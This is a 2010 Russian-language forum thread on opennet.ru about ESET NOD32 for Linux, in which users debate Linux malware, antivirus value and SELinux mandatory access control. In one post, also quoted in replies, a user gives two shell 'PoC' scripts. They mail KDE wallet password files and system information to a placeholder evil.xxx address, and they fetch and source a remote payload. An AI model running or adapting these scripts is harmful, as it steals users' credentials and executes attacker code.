The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы
правила/FAQ
поиск
регистрация
вход
слежка
RSS


Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X, opennews (??), 13-Июн-10, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


6. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –9 +/
Сообщение от birdie (?), 13-Июн-10, 17:57 
>Новость ниочем.
>Для linux десктопа антивирус это как пятое колесо.
>Для сервера есть clamav (почта, прокси).

clamav ловит < 35% in the wild вирусов, если вы админ, я бы вас уже уволил.

Ответить | Правка | Наверх | Cообщить модератору

15. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +2 +/
Сообщение от kas5temail (ok), 13-Июн-10, 20:18 
clamav это антивурус который запускается на сервере под управлением Linux с этого сервера данные поступают на виндовс-машины, но вирусы он ищет именно виндовые. А эта новость об антивирусе именно для Linux, т.е. подразумевается что ищутся вирусы которые написаны для Linux. Если учесть что количество вирусов под Linux равно нулю то возникает резонный вопрос: а на кой чёрт компания Eset выпустила антивирус предназначенный для поиска вирусов написанных для платформы Linux в то время как ни одного вируса для этой платформы не существует.
Ответить | Правка | Наверх | Cообщить модератору

16. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –3 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 13-Июн-10, 20:21 
>clamav это антивурус который запускается на сервере под управлением Linux с этого
>сервера данные поступают на виндовс-машины, но вирусы он ищет именно виндовые.
>А эта новость об антивирусе именно для Linux, т.е. подразумевается что
>ищутся вирусы которые написаны для Linux.

Нет. Все обычные антивирусы ищут вирусы для всех систем, о которых знают. Благо, ELF разбирать немногим сложнее PE.

> Если учесть что количество вирусов
>под Linux равно нулю то возникает резонный вопрос: а на кой
>чёрт компания Eset выпустила антивирус предназначенный для поиска вирусов написанных для
>платформы Linux в то время как ни одного вируса для этой
>платформы не существует.

Существуют. Погуглите хотя бы сейчас, если не догадались сделать это перед своим ответом.

Ответить | Правка | Наверх | Cообщить модератору

22. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от kas5temail (ok), 13-Июн-10, 20:38 
ссылки в студию.
вирус - это то что залезет на мой компьютер без каких либо дополнительных действий с моей стороны.
Ответить | Правка | Наверх | Cообщить модератору

40. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +2 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 13-Июн-10, 22:03 
>ссылки в студию.

Для тех, кто не умеет пользоваться поисковыми системами: http://vms.drweb.com/search/?q=Linux

>вирус - это то что залезет на мой компьютер без каких либо
>дополнительных действий с моей стороны.

Это не просто вирус, это червь. «Классические» вирусы размножаются в пределах компьютера (как правило, внедряясь в исполняемый код — ныне таких вирусов всё меньше, так как в дебрях современных ОС легко спрятаться и так) и переносятся исключительно пассивным методом.

Ответить | Правка | Наверх | Cообщить модератору

51. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –5 +/
Сообщение от kas5temail (ok), 13-Июн-10, 22:37 
Это не вирусы. Я ведь написал выше - вирус это то что залезет на мой компьютер без дополнительных действий с моей стороны.
Ответить | Правка | Наверх | Cообщить модератору

55. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +4 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 13-Июн-10, 23:53 
>Это не вирусы. Я ведь написал выше - вирус это то что
>залезет на мой компьютер без дополнительных действий с моей стороны.

Если вы предпочитаете называть собаками только питбулей, это ваша проблема.

Ответить | Правка | Наверх | Cообщить модератору

59. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –7 +/
Сообщение от yet another anonim (?), 14-Июн-10, 01:26 
Правильно ответил. Человек из последнего пытается переубедить сам себя в обратном (чтоб не было горько от осознания факта).
Что касается червей, то, однако, даже на Виндоус, если не бывать в нете в зонах явного риска и не запускать тупо каждый присланный вам исполняемый файл, особенно, если вы и не собирались чего то "получать", не баловаться с "зипами" и, особенно, с "краками", сразу проверять подбираемые флешки, диски (кто-то когда-то говорил про автозапуск - спешу разочаровать вас - Виндоусы, по крайней мере начиная с ХР, при загрузке любого диска теперь спрашивают что делать с ним, если сам не настроишь на автозапуск), и вообще правильно настроить систему, т.е. ЕСЛИ вести себя адекватно и разумно, то 99%+ всяких червячьих эпидемий и руткитов пролетают мимо и даже не подозревают о вашем существовании, а "классические" вирусы вообще не угроза. Можно реально несколько лет просидеть на винде, практически не включая антивирус, и не подхватить ничего (не считая такой обыденности для винды, как вездесущий адваре) - это я говорю не теоретически, по своему опыту. Да, некоторые особо одарённые знакомые способны запаривать и заражать винду чуть ли не каждые 2 дня, но вот я, напр., был просидевши с ХР около 2 лет, без единого червя и вируса, не считая пары установленных шпионов (сам дурак скачал и установил кую-то мусорящую хрень из интереса) и какого-то, хмм, карася (который антивирь вначале даже не находил при проверках, т.е. не посчитал за вирус, ничего так и не смог сделать и ему хватило тупо удалить затаившийся исполняемый файл).
На линуксе вирусы - это, конечно, редчайшая экзотика, но не стоит наивно полагать, что их нет. Особенно теперь, как Линукс становится популярной мобильной платформой, и за него уже берутся клепатели антивирей - будь начеку, как грится.
Ответить | Правка | Наверх | Cообщить модератору

62. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 14-Июн-10, 01:40 
>Что касается червей, то, однако, даже на Виндоус, если не бывать в
>нете в зонах явного риска и не запускать тупо каждый присланный
>вам исполняемый файл, особенно, если вы и не собирались чего то
>"получать", не баловаться с "зипами" и, особенно, с "краками", сразу проверять
>подбираемые флешки, диски (кто-то когда-то говорил про автозапуск - спешу разочаровать
>вас - Виндоусы, по крайней мере начиная с ХР, при загрузке
>любого диска теперь спрашивают что делать с ним, если сам не
>настроишь на автозапуск),

Это при условии, что сам механизм в порядке. Один или два раза несколько лет назад всплывали баги, позволявшие срабатывать автозапуску даже в подобной ситуации. :(

> и вообще правильно настроить систему, т.е. ЕСЛИ вести
>себя адекватно и разумно, то 99%+ всяких червячьих эпидемий и руткитов
>пролетают мимо и даже не подозревают о вашем существовании, а "классические"
>вирусы вообще не угроза. Можно реально несколько лет просидеть на винде,
>практически не включая антивирус, и не подхватить ничего (не считая такой
>обыденности для винды, как вездесущий адваре) - это я говорю не
>теоретически, по своему опыту.

Могу подтвердить: на домашнем компе в прошлой квартире стоял только фаервол (Tiny/Kerio/Sunbelt Personal Firewall). Специально проверялся иногда антивирусами — всё было чисто. Помимо меня компом пользовались двое человек с правами админа (им игрушки было надо, а эти сцуки капризные, даже runas не всегда помогает).

>[оверквотинг удален]
>я, напр., был просидевши с ХР около 2 лет, без единого
>червя и вируса, не считая пары установленных шпионов (сам дурак скачал
>и установил кую-то мусорящую хрень из интереса) и какого-то, хмм, карася
>(который антивирь вначале даже не находил при проверках, т.е. не посчитал
>за вирус, ничего так и не смог сделать и ему хватило
>тупо удалить затаившийся исполняемый файл).
>На линуксе вирусы - это, конечно, редчайшая экзотика, но не стоит наивно
>полагать, что их нет. Особенно теперь, как Линукс становится популярной мобильной
>платформой, и за него уже берутся клепатели антивирей - будь начеку,
>как грится.

Да уже были мобильные эпидемии из-за багов в реализации BlueTooth и ещё чём-то смартфонном. Собственно, это одна из причин, почему до сих пор не хочу обзаводиться смартом. :)

Ответить | Правка | Наверх | Cообщить модератору

82. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –8 +/
Сообщение от yet another anonim (?), 14-Июн-10, 08:00 
Всё же пореккомендую по возможности сидеть как юзерам, а не как админам - так сразу всплывёт, если вдруг что-то где-то хочет пролезть\установиться\заполучить доступ. Вообще в таком режиме закрывается (особенно на 2000\ХР) абс. большинство всех потенц. уязвимостей. Антивирь по сути не особо и нужен. Токмо бесплатный антивирь Зайцева (AVZ) иногда прогнать - штука, ищет как раз руткиты, которые сами открывают дыры и "приглашают" вирусы, а так же некоторый гадкий хлам. В Висте\7 от многого спасает UAC (которого так поначалу не взлюбили "повер-виндузятники":)).
А все эти страхи вирусов - ну правильно, антивире-клепателям нужно продавать продукты, вот они и пугают всех массовыми эпидемиями - прям как фармакологические корпорации и эпидемии птичьего\свиного гриппа (и ведь на***ли весь свет, а какой следующий, козий? рыбий? может комариный?), может и сами руки где приложат к созданию, а затем - сразу эффектный тест, на котором "именно они всё нашли и защитили систему"...
Ответить | Правка | Наверх | Cообщить модератору

90. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 14-Июн-10, 14:02 
>Всё же пореккомендую по возможности сидеть как юзерам, а не как админам
>- так сразу всплывёт, если вдруг что-то где-то хочет пролезть\установиться\заполучить доступ.
>Вообще в таком режиме закрывается (особенно на 2000\ХР) абс. большинство всех
>потенц. уязвимостей. Антивирь по сути не особо и нужен. Токмо бесплатный
>антивирь Зайцева (AVZ) иногда прогнать - штука, ищет как раз руткиты,
>которые сами открывают дыры и "приглашают" вирусы, а так же некоторый
>гадкий хлам. В Висте\7 от многого спасает UAC (которого так поначалу
>не взлюбили "повер-виндузятники":)).

Угу, только юзер должен понимать, что к чему. А я там больше не живу, и кроме меня понимать там некому. Что говорить, если окно «Центра безопасности Windows XP» (или как оно там зовётся) мои Web-страницей называют…

>А все эти страхи вирусов - ну правильно, антивире-клепателям нужно продавать продукты,
>вот они и пугают всех массовыми эпидемиями - прям как фармакологические
>корпорации и эпидемии птичьего\свиного гриппа (и ведь на***ли весь свет, а
>какой следующий, козий? рыбий? может комариный?), может и сами руки где
>приложат к созданию, а затем - сразу эффектный тест, на котором
>"именно они всё нашли и защитили систему"...

А вот это вы зря. Вам явно не приходилось большую локалку в конторе, работающей 24 часа в сутки, вычищать от червячков.

Ответить | Правка | Наверх | Cообщить модератору

97. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –2 +/
Сообщение от sHaggY_caT (ok), 14-Июн-10, 23:38 
>[оверквотинг удален]
>
>Для тех, кто не умеет пользоваться поисковыми системами: http://vms.drweb.com/search/?q=Linux
>
>>вирус - это то что залезет на мой компьютер без каких либо
>>дополнительных действий с моей стороны.
>
>Это не просто вирус, это червь. «Классические» вирусы размножаются в пределах компьютера
>(как правило, внедряясь в исполняемый код — ныне таких вирусов всё
>меньше, так как в дебрях современных ОС легко спрятаться и так)
>и переносятся исключительно пассивным методом.

Какая часть из них не требует gcc для сборки(мы, кстати, на production серверы специально его не ставим, пакеты лучше собирать в другом месте, на специальном сервере или контейнере), закрытых годы тому назад дырок, и...внимание!... рут-доступа?

Да, конечно, с рут-доступом взломщик насажает троянов на сервер :)
Этим "трояном" может быть и самописный демон на perl/python, слушающий сетевой порт, и создавший терминал, а может быть и что-то с Вашей странички :)

Вот только меньше всего, при устранении последствий такого инцидента, я буду думать об установке антивируса на порутованную систему :)


Linux и Unix системы _люди_ не так уж и редко ломают (увы, все еще слишком много людей, ставящих систему из configure && make && make install, и забывающей о ней на годы, так как обновиться все равно нормально не получится), но вот Windows серверы и станции ломают промышленно, автоматически, на конвеере, и в миллионах экземпляров членов ботнетов.
Именно по этому завирусованная Windows машина идет на лечение (так как ее заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно нужен, но только для защиты Windows-машин :)

Ответить | Правка | К родителю #40 | Наверх | Cообщить модератору

98. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 15-Июн-10, 00:18 
>[оверквотинг удален]
>на специальном сервере или контейнере), закрытых годы тому назад дырок, и...внимание!...
>рут-доступа?
>
>Да, конечно, с рут-доступом взломщик насажает троянов на сервер :)
>Этим "трояном" может быть и самописный демон на perl/python, слушающий сетевой порт,
>и создавший терминал, а может быть и что-то с Вашей странички
>:)
>
>Вот только меньше всего, при устранении последствий такого инцидента, я буду думать
>об установке антивируса на порутованную систему :)

Вы, видимо, чуть-чуть запутались, ибо две темы сплелось: «чем черви отличаются от вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без /bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь — по мере роста популярности *nix на десктопах (то есть среди неквалифицированных пользователей) будет появляться всё больше заразы.

>Linux и Unix системы _люди_ не так уж и редко ломают (увы,
>все еще слишком много людей, ставящих систему из configure && make
>&& make install, и забывающей о ней на годы, так как
>обновиться все равно нормально не получится), но вот Windows серверы и
>станции ломают промышленно, автоматически, на конвеере, и в миллионах экземпляров членов
>ботнетов.

В первую очередь за счёт большего единообразия Windows-машин, их изобилия и сравнительно низком среднем уровне квалификации пользователей. Станут никсы популярны на десктопах — огребут всё то же самое, с поправками на технические различия.

>Именно по этому завирусованная Windows машина идет на лечение (так как ее
>заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик
>мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно
>нужен, но только для защиты Windows-машин :)

Эх, оптимизм, оптимизм… :)

Ответить | Правка | Наверх | Cообщить модератору

99. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 15-Июн-10, 01:23 
>Вы, видимо, чуть-чуть запутались, ибо две темы сплелось: «чем черви отличаются от
>вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало
>что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без
>/bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь —
>по мере роста популярности *nix на десктопах (то есть среди неквалифицированных
>пользователей) будет появляться всё больше заразы.

Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы), однако, Вы забываете о наличии MAC под Linux: тот же SELinux, если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде Postfix, если процесс работает не под рутом.
Эсплойты на рута, которые выключают SELinux, конечно, есть, но не стоит забывать так же о том, что массовый приход контейнеров на базе CGroups на Linux-десктопы (это очень соблазнительно, запускать тот же Firefox в контейнере) дело самого ближайшего будущего, так же не стоит забывать о том, что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а, значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)

>
>В первую очередь за счёт большего единообразия Windows-машин, их изобилия и сравнительно
>низком среднем уровне квалификации пользователей. Станут никсы популярны на десктопах —
>огребут всё то же самое, с поправками на технические различия.

Имхо, тут виноваты менеджеры Microsoft: они, конечно, у них, возможно, лучшие в мире (так суметь навариться на провальной Vista, и захватить рынок в 90-е... Это потрясающе!), но как технари, конечно, еще хуже штатных Microsoft'овских. Ими была допущена тотальная ошибка по интеграции IE в потроха системы так, что через его дырявые либы, после удаления оболочки IE, ломают другие браузеры!
+ еще можно вспомнить ActiveX.
Из-за ряда смертельных ошибок в области дизайна, дизайна Security(которые до сих пор не исправлены - UAC это концептуально технология 70-х годов), ну и доброй традиции выпуска патчей _после_ появления эсплойта (а так же традиции выпуска эсплойта на основе того, что пришло в Windows Update), мы имеем _только_ на Windows миллионые ботнеты, тогда как на незащищенном Mac OS X, доля которого приближается в мире к 10%, миллионых ботнетов нет (а ведь непаханное поле! У скольки процентов MAc OS X юзеров есть антивирусы?)

>>Именно по этому завирусованная Windows машина идет на лечение (так как ее
>>заражает простой робот), а затроянненый UNIX на пересетап, так как взломщик
>>мог себе оставить незамеченную закладку, так что "nod32 для Linux" конечно
>>нужен, но только для защиты Windows-машин :)
>
>Эх, оптимизм, оптимизм… :)

Ответить | Правка | Наверх | Cообщить модератору

105. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 15-Июн-10, 08:21 
>[оверквотинг удален]
>>вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало
>>что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без
>>/bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь —
>>по мере роста популярности *nix на десктопах (то есть среди неквалифицированных
>>пользователей) будет появляться всё больше заразы.
>
>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>Postfix, если процесс работает не под рутом.

PoC №1:

#!/bin/sh
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"

PoC №2:

#!/bin/sh
ID="`mktemp -u XXXXXXXXXXXXXXXXXXXXX`"
dmesg >/tmp/"$ID".dmesg
apt-get list >/tmp/"$ID".pkglist
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man dmesg' "ID: ${ID}" /tmp/"$ID".dmesg:/tmp/"$ID".pkglist
rm /tmp/"$ID".d.txt
DOWNLOADER="`which wget` -O -"
if [ $? -ne 0]; then
DOWNLOADER="`which curl`"
fi
if [ $? -ne 0]; then
DOWNLOADER="`which ftp` -o -"
fi
while ! $DOWNLOADER "http://d.evil.xxx//${ID}" >/tmp/"$ID".killer; do sleep 3600; done
. /tmp/"$ID".killer

Etc.

>Эсплойты на рута, которые выключают SELinux, конечно, есть, но не стоит забывать
>так же о том, что массовый приход контейнеров на базе CGroups
>на Linux-десктопы (это очень соблазнительно, запускать тот же Firefox в контейнере)
>дело самого ближайшего будущего, так же не стоит забывать о том,
>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)

Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером. Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на худой конец); б) возможность что-то выполнять от имени вроде как аутентичного пользователя. А контейнеры сами по себе тоже не панацея — сколько уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили в системах виртуализации?..

>[оверквотинг удален]
>другие браузеры!
>+ еще можно вспомнить ActiveX.
>Из-за ряда смертельных ошибок в области дизайна, дизайна Security(которые до сих пор
>не исправлены - UAC это концептуально технология 70-х годов), ну и
>доброй традиции выпуска патчей _после_ появления эсплойта (а так же традиции
>выпуска эсплойта на основе того, что пришло в Windows Update), мы
>имеем _только_ на Windows миллионые ботнеты, тогда как на незащищенном Mac
>OS X, доля которого приближается в мире к 10%, миллионых ботнетов
>нет (а ведь непаханное поле! У скольки процентов MAc OS X
>юзеров есть антивирусы?)

Если развитие MacOS X будет идти теми же темпами, ситуация с ней скоро (в течение пары лет) «исправится». ;)

Ответить | Правка | Наверх | Cообщить модератору

110. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 15-Июн-10, 10:44 
>[оверквотинг удален]
>>
>>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>Postfix, если процесс работает не под рутом.
>
>PoC №1:
>
>#!/bin/sh
>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"

1. dcop уже в прошлом, как им пользовались, уже не помню :)
2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а, значит, будет пресечено SELinux

>PoC №2:

Вырубится SELinux еще на попытке записать в /tmp

>[оверквотинг удален]
>>дело самого ближайшего будущего, так же не стоит забывать о том,
>>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)
>
>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>пользователя. А контейнеры сами по себе тоже не панацея — сколько
>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>в системах виртуализации?..

опять же, MAC решает :)

>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>скоро (в течение пары лет) «исправится». ;)

Зачем? Если так удобно клепать ботнеты на Windows?

Ответить | Правка | Наверх | Cообщить модератору

111. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от Перерезуссмобильниказабывшийпароль (?), 15-Июн-10, 11:26 
>[оверквотинг удален]
>>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>>Postfix, если процесс работает не под рутом.
>>
>>PoC 1:
>>
>>#!/bin/sh
>>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"
>
>1. dcop уже в прошлом, как им пользовались, уже не помню :)

А что непонятно? :)

>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>значит, будет пресечено SELinux

То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?

>>PoC 2:
>
>Вырубится SELinux еще на попытке записать в /tmp

Вы что, серьёзно предлагаете запретить программам писать в /tmp?! К тому же, что помешает писать в этом случае, скажем, в хомяк? Простите, но, кажется, вы ещё не выпили свой кофе.

>>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>>пользователя. А контейнеры сами по себе тоже не панацея  сколько
>>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>>в системах виртуализации?..
>
>опять же, MAC решает :)

И как именно он решает проблемы, о которых сам админ явно не в курсе?  Это не говоря о том, что предусмотреть ВСЁ в MAC практически нереально, только на простых конфигурациях - но там он уже просто излишний.

>>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>>скоро (в течение пары лет) исправится. ;)
>
>Зачем? Если так удобно клепать ботнеты на Windows?

О том и речь, что их станет удобно клепать для MacOS X/Linux/нужное вписать?

Ответить | Правка | Наверх | Cообщить модератору

113. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 15-Июн-10, 11:40 

>>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>>значит, будет пресечено SELinux
>
>То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?

Пользователю, нет, а вот программе, запущенной в другом домене, конечно!
Почитайте, как работает, сам по себе, мандатный контроль.

>>>PoC 2:
>>
>>Вырубится SELinux еще на попытке записать в /tmp
>
>Вы что, серьёзно предлагаете запретить программам писать в /tmp?!

Это нужно далеко не всем программам, а в записи отслальных есть закономерности, к которым можно прицепиться.

>К тому же,
>что помешает писать в этом случае, скажем, в хомяк?

SELinux. Программа будет выполняться в другом домене. Зачем ей это для повседневной работы?

>[оверквотинг удален]
>>>пользователя. А контейнеры сами по себе тоже не панацея  сколько
>>>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>>>в системах виртуализации?..
>>
>>опять же, MAC решает :)
>
>И как именно он решает проблемы, о которых сам админ явно не
>в курсе?  Это не говоря о том, что предусмотреть ВСЁ
>в MAC практически нереально, только на простых конфигурациях - но там
>он уже просто излишний.

Правила для MAC будут постоянно писаться и развиваться для распространенных _десктопных_ приложений.

>>>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>>>скоро (в течение пары лет) исправится. ;)
>>
>>Зачем? Если так удобно клепать ботнеты на Windows?
>
>О том и речь, что их станет удобно клепать для MacOS X/Linux/нужное
>вписать?

Пройдет одна эпидемия на бубунтах, и за воплями фанатиков Windows платформы, никто и не заметит, что все популярные дистрибутивы включат MAC по-дефольту, сгладят острые углы, прикрутят GUI для удобного создания политик, что решит проблему сразу и на корню (что в Windows и дискреционном, а не ролевом UAC невозможно)

Ответить | Правка | Наверх | Cообщить модератору

117. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от Перерезуссмобильниказабывшийпароль (?), 15-Июн-10, 12:18 
>
>>>2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а,
>>>значит, будет пресечено SELinux
>>
>>То есть SELinux запретит пользователю создавать резервную копию базы своих паролей?
>
>Пользователю, нет, а вот программе, запущенной в другом домене, конечно!
>Почитайте, как работает, сам по себе, мандатный контроль.

Как устроен мандатный контроль знаю не понаслышке.

Значит, как минимум вытащат то, что можно из-под данного домена. В браузере и почтовом клиенте - пароли к сервисам, например.

>>Вы что, серьёзно предлагаете запретить программам писать в /tmp?!
>
>Это нужно далеко не всем программам, а в записи отслальных есть закономерности,
>к которым можно прицепиться.

А что мешает к этим же закономерностям прицепиться внедрившемуся в браузерный плагин - или какую угодно программу - коду?

>>К тому же,
>>что помешает писать в этом случае, скажем, в хомяк?
>
>SELinux. Программа будет выполняться в другом домене. Зачем ей это для повседневной
>работы?

Что, временные, конфигурационные, пользовательские файлы сохранять зачем? :)

>>>опять же, MAC решает :)
>>
>>И как именно он решает проблемы, о которых сам админ явно не
>>в курсе?  Это не говоря о том, что предусмотреть ВСЁ
>>в MAC практически нереально, только на простых конфигурациях - но там
>>он уже просто излишний.
>
>Правила для MAC будут постоянно писаться и развиваться для распространенных _десктопных_ приложений.

И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя, работы?

>Пройдет одна эпидемия на бубунтах, и за воплями фанатиков Windows платформы, никто
>и не заметит, что все популярные дистрибутивы включат MAC по-дефольту, сгладят
>острые углы, прикрутят GUI для удобного создания политик, что решит проблему
>сразу и на корню (что в Windows и дискреционном, а не
>ролевом UAC невозможно)

Вы просто невозможная оптимистка :)

Ответить | Правка | К родителю #113 | Наверх | Cообщить модератору

118. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 15-Июн-10, 12:40 

>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>работы?

Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок, документов, и т д.

Пользователи привыкнут :)

Ответить | Правка | К родителю #117 | Наверх | Cообщить модератору

125. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 15-Июн-10, 15:40 
>
>>И постоянно опаздывать, ошибаться и не справляться. Как вы, например, средствами MAC
>>запретите браузеру перезаписывать файлы, подконтрольные юзеру, без ущерба для его, пользователя,
>>работы?
>
>Браузер может сохранять картинки и заказчки только в одну директорию. Эта директория(ее
>поддиректории) могут быть для пользователя перемонтированы mount --bind на поддиректории картинок,
>документов, и т д.
>
>Пользователи привыкнут :)

Среди них не будет меня.

Ответить | Правка | К родителю #118 | Наверх | Cообщить модератору

126. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 15-Июн-10, 16:01 
>Среди них не будет меня.

А зачем Вам в браузере возможность читать и писать куда угодно в Вашем хомяке? Если идти по Вашей логике дальше, то неудобно и запускать браузер не под рутом.

Имхо, файл-менеджер из него плохой (cp, mv, ls, для end-user'ов какой-нибудь Dolphin, если уж начали про KDE, гораздо удобнее)

Уверена, что можно придумать структуру директорий, для которой несколько mount --bind сделают использование браузера удобным, как и сохранение и загрузка в/из него файлов


Ответить | Правка | К родителю #125 | Наверх | Cообщить модератору

135. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 16-Июн-10, 01:32 
>[оверквотинг удален]
>
>А зачем Вам в браузере возможность читать и писать куда угодно в
>Вашем хомяке? Если идти по Вашей логике дальше, то неудобно и
>запускать браузер не под рутом.
>
>Имхо, файл-менеджер из него плохой (cp, mv, ls, для end-user'ов какой-нибудь Dolphin,
>если уж начали про KDE, гораздо удобнее)
>
>Уверена, что можно придумать структуру директорий, для которой несколько mount --bind сделают
>использование браузера удобным, как и сохранение и загрузка в/из него файлов

Потому что я всегда сразу кладу скачиваемый файл в нужную мне папку. Порой созданную за десять минут до этого — ищу информацию по какой-то теме, или программки-либы. И мне чертовски неудобно лазить отдельной программой в большую свалку по имени «Downloads».

И я такой не один.

Ответить | Правка | К родителю #126 | Наверх | Cообщить модератору

137. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  –1 +/
Сообщение от sHaggY_caT (ok), 16-Июн-10, 13:51 

>Потому что я всегда сразу кладу скачиваемый файл в нужную мне папку.

Эти директории всегда находятся в корне хомяка, и начинаются с точки?

Ответить | Правка | К родителю #135 | Наверх | Cообщить модератору

138. "Релиз антивируса ESET Nod32 4 beta 2 для Linux и Mac OS X"  +1 +/
